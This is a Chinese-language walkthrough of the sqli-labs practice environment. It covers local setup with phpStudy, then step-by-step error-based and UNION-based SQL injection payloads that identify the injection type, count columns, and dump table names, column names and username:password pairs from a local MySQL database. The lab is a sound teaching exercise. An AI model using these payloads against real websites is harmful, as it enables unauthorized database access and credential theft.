环境搭建
下载复现漏洞的包
下载小皮面板
将下载好的文件解压在小皮面板的phpstudy_pro\WWW路径下
将这个文件phpstudy_pro\WWW\sqli-labs-php7-master\sql-connections\db-creds.inc
中的密码更改为小皮面板中的密码
选择php版本
在小皮中启动nginx和数据库
使用环回地址访问
先判断是什么类型的注入
使用id=2-1和id=1,如果两者结果相同则为字符型否则为数字类
id=1后面加'或"查看报错
使用后发现返回值为mysql的报错
使用id=' --+
发现结果和id=1一致说明我们第一次使用 ' 时使mysql语句中多了个 ' 第二次使用--+说明输入的单引号与前面的id=1形成了一个闭合,因此可以判断注入类型为字符型,闭合方式为单引号
我们要对字段数进行判断
id=1' order by 1 --+ 可以使用二分大法
找到准确的列数后可以用union进行查询了,比如列数是3
id=1' union select 1,2,3 limit 1,1 --+ 或者
id=-1' union select 1,2,3 --+
联合查询的输出是严格按照顺序进行的,因此当id=1存在时会在第0行输出第一个sql语句查询到的结果,输入的数字就到了下一行 而 limit 1,2的作用为从第num1行开始显示num2行内容
我们可以看到2,3被输出了,说明这两个位置都可以作为回显点
也可以不用limit语句,只需让前面sql语句查询结果为空
然后就可以开始爆库名了
id=-1' union select 1,database(),3 --+
database()显示当前库名称 也可以使用group_concat() 将所有内容写入一行并输出
爆表名
id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
查找数据库中security库下的所有表名
payload:information_schema是mysql自带的库,记录了该数据库所有的表名和字段名
显然users十分关键
看字段名
id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
查询数据库security下表users中的所有字段
同理username与password看起来非常重要
进去看看
id=-1' union select 1,group_concat(username,0x3a,password),3 from security.users --+
查询security库中users表中字段username与password的所有信息
0x3a为16进制 意思是 ' :'